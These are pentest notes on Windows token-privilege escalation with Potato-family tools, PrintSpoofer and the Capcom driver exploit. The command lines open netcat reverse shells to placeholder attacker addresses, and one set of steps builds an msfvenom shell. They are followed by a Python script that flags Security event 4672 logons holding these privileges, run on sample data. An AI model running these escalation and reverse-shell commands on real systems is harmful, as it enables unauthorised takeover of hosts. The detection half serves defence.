# windows token exploits

## Churrasco

**REQUIREMENTS:**

* SeImpersonatePrivilege
* Windows XP/Vista/2003/2008, Windows Server 2003

```bash
# usage: -d runs the given command with the impersonated token
> churrasco.exe -d "nc.exe -e cmd.exe IP PORT"
```

## HotPotato

* Windows 7, 8, 10, Server 2008, Server 2012

## [JuicyPotato](https://github.com/ohpe/juicy-potato)

**REQUIREMENTS:**

* SeImpersonatePrivilege
* machine is older than Windows 10 1809 / Windows Server 2019
* CLSID: <http://ohpe.it/juicy-potato/CLSID/>
  * Can use <http://ohpe.it/juicy-potato/CLSID/GetCLSID.ps1>
* Try: `{03ca98d6-ff5d-49b8-abc6-03dd84127020}`

```bash
# -l : COM server listen port
# -p : program to launch
# -a : arguments for the program
# -t : CreateProcess call to use (t = CreateProcessWithTokenW, u = CreateProcessAsUser, * = try both)
# -c : CLSID to use
> JuicyPotato.exe -l 1337 -p "c:\windows\system32\cmd.exe" -a "/c PATH\nc.exe -e cmd.exe IP PORT" -t * -c CLSID
> Juicy.Potato.x86.exe -l 1337 -p "c:\users\public\kashz.exe" -t * -c CLSID

# -i : interactive, -u : run as the given user
> PSExec64.exe -i -u "nt authority\local service" <shell.exe>
```

## [PrintSpoofer](https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0)

**REQUIREMENTS:**

* SeImpersonatePrivilege
* Win10, Server 2016, Server 2019

```bash
> PrintSpoofer.exe -i -c cmd.exe
> PrintSpoofer.exe -c "nc.exe IP PORT -e cmd.exe"
# -i : interactive
# -c : command to run
```

## [RoguePotato](https://github.com/antonioCoco/RoguePotato)

**REQUIREMENTS:**

* SeImpersonatePrivilege
* machine is >= Windows 10 1809 & Windows Server 2019

```bash
# socat redirector for OXID resolving, must use 135
$ socat tcp-listen:135,reuseaddr,fork tcp:KALI_IP:9999
# -r : IP of the redirector, -e : command to run, -l : local listen port (where the redirector forwards to)
> RoguePotato.exe -r KALI_IP -e "PATH\nc.exe IP PORT -e cmd.exe" -l 9999
```

## [SeLoadDriverPrivilege](https://book.hacktricks.xyz/windows/active-directory-methodology/privileged-accounts-and-token-privileges#capcom-sys-driver-exploit)

**REQUIREMENTS:**

* Visual Studio to compile

### Steps:

1. Obtain the user's SID (either of these works)
   1. `Get-ADUser -Identity 'svc-print' | select SID`
   2. `(New-Object System.Security.Principal.NTAccount("svc-print")).Translate([System.Security.Principal.SecurityIdentifier]).value`
2. Clone repo: [tandasat/ExploitCapcom/](https://github.com/tandasat/ExploitCapcom/)
3. Generate an `.exe` msfvenom reverse shell
4. Update the path to the reverse shell on the target at line 410 of `ExploitCapcom.cpp`
5. Set the build configuration to Release
6. Build the solution
7. Run `.\ExploitCapcom.exe`

## SeBackupPrivilege

* <https://github.com/giuliano108/SeBackupPrivilege>
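Every section above starts from the same precondition: a logon that holds SeImpersonatePrivilege (Churrasco, HotPotato, JuicyPotato, PrintSpoofer, RoguePotato), SeLoadDriverPrivilege (ExploitCapcom) or SeBackupPrivilege. On the defensive side, Windows records exactly that fact in Security event 4672 ("Special privileges assigned to new logon"), which lists the sensitive privileges granted at logon time. The following Python example is added to these notes and is not part of any tool linked on this page: it parses the message text of 4672 records, drops the well-known service SIDs that always carry these rights, and reports the remaining logons that hold one of the three privileges. The SIDs, account names, logon IDs and the `_record` helper are constructed sample data.

```python
"""Added detection example: flag Security event 4672 logons that hold the
token privileges the tools on this page depend on."""
import re
from dataclasses import dataclass

# Real privilege names; each is the precondition for one family of tools above.
WATCHED_PRIVILEGES = {
    "SeImpersonatePrivilege",  # Churrasco, HotPotato, JuicyPotato, PrintSpoofer, RoguePotato
    "SeLoadDriverPrivilege",   # ExploitCapcom
    "SeBackupPrivilege",       # SeBackupPrivilege abuse
}

# Well-known SIDs of LocalSystem, LocalService and NetworkService: they always
# carry these rights, so every such logon would alert. Extend per environment.
ALLOWLISTED_SIDS = {"S-1-5-18", "S-1-5-19", "S-1-5-20"}

_FIELD = re.compile(r"^\s*(Security ID|Account Name|Account Domain|Logon ID):\s*(\S.*?)\s*$", re.M)
_PRIV = re.compile(r"\bSe\w+Privilege\b")


@dataclass(frozen=True)
class SpecialLogon:
    account: str
    sid: str
    logon_id: str
    privileges: frozenset


def parse_4672(text: str) -> SpecialLogon:
    """Extract the subject fields and the privilege list from a 4672 message."""
    fields = dict(_FIELD.findall(text))
    # Privilege names only appear after the "Privileges:" label.
    _, _, priv_section = text.partition("Privileges:")
    return SpecialLogon(
        account=f"{fields.get('Account Domain', '?')}\\{fields.get('Account Name', '?')}",
        sid=fields.get("Security ID", "?"),
        logon_id=fields.get("Logon ID", "?"),
        privileges=frozenset(_PRIV.findall(priv_section)),
    )


def flag_logons(events, allowlist=ALLOWLISTED_SIDS):
    """Return (account, logon_id, [watched privileges]) for every logon that is
    not allowlisted by SID and holds at least one privilege in WATCHED_PRIVILEGES."""
    findings = []
    for text in events:
        logon = parse_4672(text)
        if logon.sid in allowlist:
            continue
        hit = logon.privileges & WATCHED_PRIVILEGES
        if hit:
            findings.append((logon.account, logon.logon_id, sorted(hit)))
    return findings


def _record(sid, name, domain, logon_id, privs):
    """Build a 4672 message in the layout Event Viewer's General tab uses.
    Constructed sample data only; not captured from a real host."""
    priv_lines = "\n            ".join(privs)
    return (
        "Special privileges assigned to new logon.\n\n"
        "Subject:\n"
        f"    Security ID:    {sid}\n"
        f"    Account Name:   {name}\n"
        f"    Account Domain: {domain}\n"
        f"    Logon ID:       {logon_id}\n\n"
        f"Privileges:     {priv_lines}"
    )


# Constructed sample events: one built-in SYSTEM logon (allowlisted), two service
# accounts holding watched privileges, and an admin logon with none of them.
SAMPLE_EVENTS = [
    _record("S-1-5-18", "SYSTEM", "NT AUTHORITY", "0x3E7",
            ["SeAssignPrimaryTokenPrivilege", "SeTcbPrivilege", "SeImpersonatePrivilege"]),
    _record("S-1-5-21-1111-2222-3333-1105", "svc-print", "CORP", "0x4A1B2C",
            ["SeLoadDriverPrivilege", "SeSecurityPrivilege"]),
    _record("S-1-5-21-1111-2222-3333-1120", "websvc", "CORP", "0x5D3E1F",
            ["SeAssignPrimaryTokenPrivilege", "SeImpersonatePrivilege"]),
    _record("S-1-5-21-1111-2222-3333-500", "Administrator", "CORP", "0x6F0A12",
            ["SeSecurityPrivilege", "SeDebugPrivilege"]),
]

if __name__ == "__main__":
    for account, logon_id, privs in flag_logons(SAMPLE_EVENTS):
        print(f"{account} (logon {logon_id}) holds {', '.join(privs)}")
```

In real telemetry 4672 fires on every logon of these accounts, and IIS application pool identities and many service accounts hold SeImpersonatePrivilege by design, so the SID allowlist has to be tuned per environment and the output is better used as an inventory of which accounts would satisfy the requirements listed above than as a standalone alert; pairing it with process-creation events for the same Logon ID is what turns it into a detection.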
